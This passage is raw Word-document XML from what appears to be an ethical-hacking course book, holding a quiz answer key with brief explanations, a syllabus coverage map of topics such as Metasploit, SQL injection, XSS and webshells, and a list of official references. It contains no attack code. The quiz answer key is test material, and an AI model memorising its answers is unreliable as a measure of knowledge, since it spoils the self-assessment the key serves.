        <w:t xml:space="preserve"> OSCP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> CEH (exam only)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">D.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> None of these are hands-on</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="100" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Answer Key</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975"/>
        <w:gridCol w:w="975"/>
        <w:gridCol w:w="7796"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="975"/>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Q#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="975"/>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Answer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7796"/>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Why</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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B</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7796"/>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Authorisation is the deciding legal factor, not skill, tools, or timing alone.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7796"/>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Maintaining Access, where backdoors/persistence are used to retain control, aligns with the C2 stage.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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D</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7796"/>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This vector scores 9.8, in the Critical band — fully remote, unauthenticated, no interaction, full impact.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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B</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7796"/>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The exploit module targets the vulnerability; the payload is what runs after it succeeds.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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B</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7796"/>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GTFOBins catalogues privilege-escalation techniques for common Unix binaries.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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B</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7796"/>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Sniper-based credential sweeps directly test for missing brute-force protections on login forms.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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B</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7796"/>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Parameterised queries address the root cause of SQL Injection by separating code from data.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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B</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7796"/>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The OWASP Top 10 and Web Security Testing Guide underpin Unit IV.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="975"/>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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7796"/>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Out-of-scope findings require responsible handling — reporting and seeking proper authorisation, not unilateral action.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="975"/>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B</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7796"/>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OSCP is specifically known for its rigorous, fully practical exam.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">(This final set deliberately spans all five units and mixes legal, technical and reporting questions, in keeping with how a comprehensive university exam is typically structured. It is provided for self-assessment and is not a guarantee of actual exam content.)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F3864" w:sz="12" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="240" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Syllabus Coverage Map</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A quick cross-check that every official syllabus line item is covered somewhere in this book.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="BBBBBB" w:sz="4"/>
          <w:left w:val="single" w:color="BBBBBB" w:sz="4"/>
          <w:bottom w:val="single" w:color="BBBBBB" w:sz="4"/>
          <w:right w:val="single" w:color="BBBBBB" w:sz="4"/>
          <w:insideH w:val="single" w:color="BBBBBB" w:sz="4"/>
          <w:insideV w:val="single" w:color="BBBBBB" w:sz="4"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4873"/>
        <w:gridCol w:w="4873"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4873"/>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Syllabus item</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4873"/>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Covered in</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4873"/>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Hacker types, ethical vs malicious, IT Act sections</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4873"/>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Unit I, Sections 1.2–1.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4873"/>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RoE, NDA, scope, consequences of unauthorised testing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4873"/>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Unit I, Section 1.6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4873"/>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5 Phases + Cyber Kill Chain + Red/Blue/Purple</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4873"/>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Unit I, Sections 1.7–1.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4873"/>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VAPT vs PT vs VA, PTES, OWASP WSTG, lab setup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4873"/>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Unit I, Sections 1.10–1.12</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4873"/>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Passive recon (dorking, WHOIS, DNS, Shodan, theHarvester, Maltego, LinkedIn, Recon-ng)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4873"/>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Unit II, Sections 2.2–2.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4873"/>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Nmap scan types, NSE, timing, banner grabbing, SMB/SNMP/SMTP/NetBIOS enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4873"/>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Unit II, Sections 2.10–2.13</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4873"/>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CVSS v3.1, CVE lookup, severity levels, false positives</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4873"/>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Unit II, Sections 2.15–2.18</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4873"/>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Metasploit architecture, msfconsole, payloads, MSFvenom, Meterpreter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4873"/>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Unit III, Sections 3.1–3.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4873"/>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Linux &amp; Windows privilege escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4873"/>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Unit III, Sections 3.5–3.6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4873"/>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Password attacks: John, Hashcat, Hydra</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4873"/>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Unit III, Section 3.7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4873"/>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OWASP Top 10 walkthrough (A01–A08 as named in syllabus)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4873"/>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Unit IV, Section 4.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4873"/>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Burp Suite workflow (FoxyProxy, Repeater, Intruder, Decoder, scope)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4873"/>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Unit IV, Section 4.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4873"/>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SQLi manual + UNION extraction on DVWA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4873"/>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Unit IV, Section 4.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4873"/>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Reflected/Stored/DOM XSS, cookie theft</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4873"/>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Unit IV, Section 4.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4873"/>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File upload vulnerability, PHP webshell, validation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4873"/>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Unit IV, Section 4.6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4873"/>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CSRF, broken authentication, Burp Intruder brute force</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4873"/>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Unit IV, Sections 4.7–4.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4873"/>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Report structure, CVSS worked examples, risk heat map</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4873"/>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Unit V, Sections 5.1–5.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4873"/>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Remediation strategies, VAPT deliverable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4873"/>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Unit V, Sections 5.5–5.6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4873"/>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Responsible disclosure, bug bounty, certifications</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4873"/>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Unit V, Sections 5.7–5.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4873"/>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Practicals 1–8 and observation questions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4873"/>
            <w:shd w:fill="F2F2F2"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Lab Practicals — Detailed Guide</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4873"/>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Capstone VAPT report + template</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4873"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Capstone section</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F3864" w:sz="12" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="240" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">References</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The following are official or widely recognised primary sources for the topics in this book. This section provides starting points for further reading; it is not exhaustive, and version-specific details (tool versions, exact UI steps) should always be checked against the current official documentation, since these change over time.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:hyperlink w:history="1" r:id="rIdzkd4onrgzrkgtg4murlnc">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
            <w:color w:val="1155CC"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP Top 10 — official project page</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:hyperlink w:history="1" r:id="rIdmta3i--bqvpvlg57uftzx">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
            <w:color w:val="1155CC"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP Web Security Testing Guide (WSTG)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:hyperlink w:history="1" r:id="rIdkwys7cygs8s6_i1qzuoxk">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
            <w:color w:val="1155CC"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">National Vulnerability Database (NVD) — nvd.nist.gov</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:hyperlink w:history="1" r:id="rId4hmop03kjfzn_kwefcjnq">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
            <w:color w:val="1155CC"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">FIRST — CVSS v3.1 Specification Document</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:hyperlink w:history="1" r:id="rIdmumbw71ixj5r9hqmmkenv">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
            <w:color w:val="1155CC"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">FIRST — Official CVSS v3.1 Calculator</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:hyperlink w:history="1" r:id="rIdeikmaixu3pa5yx2vikx5a">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
            <w:color w:val="1155CC"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">MITRE — CVE Program</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:hyperlink w:history="1" r:id="rIdtol_0f5vgsqcaifbacys_">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
            <w:color w:val="1155CC"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">MITRE — CWE (Common Weakness Enumeration)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:hyperlink w:history="1" r:id="rIdr_vh2co-palq_pcbjxoyd">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
            <w:color w:val="1155CC"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Nmap — Official Reference Guide</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:hyperlink w:history="1" r:id="rIdswa3bajct5xms6azjwgjq">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
            <w:color w:val="1155CC"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Rapid7 — Metasploit Framework Documentation</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:hyperlink w:history="1" r:id="rIdfvnmpvn49bqy5jea7inoj">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
            <w:color w:val="1155CC"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Kali Linux — Official Documentation</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:hyperlink w:history="1" r:id="rId6e1npztwm3wnamp4dnyed">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
            <w:color w:val="1155CC"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">PortSwigger — Burp Suite Documentation</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:hyperlink w:history="1" r:id="rIdbwt-ezn-eefscrugageld">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
            <w:color w:val="1155CC"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">GTFOBins — Unix binary privilege-escalation catalogue</w:t>
        </w:r>
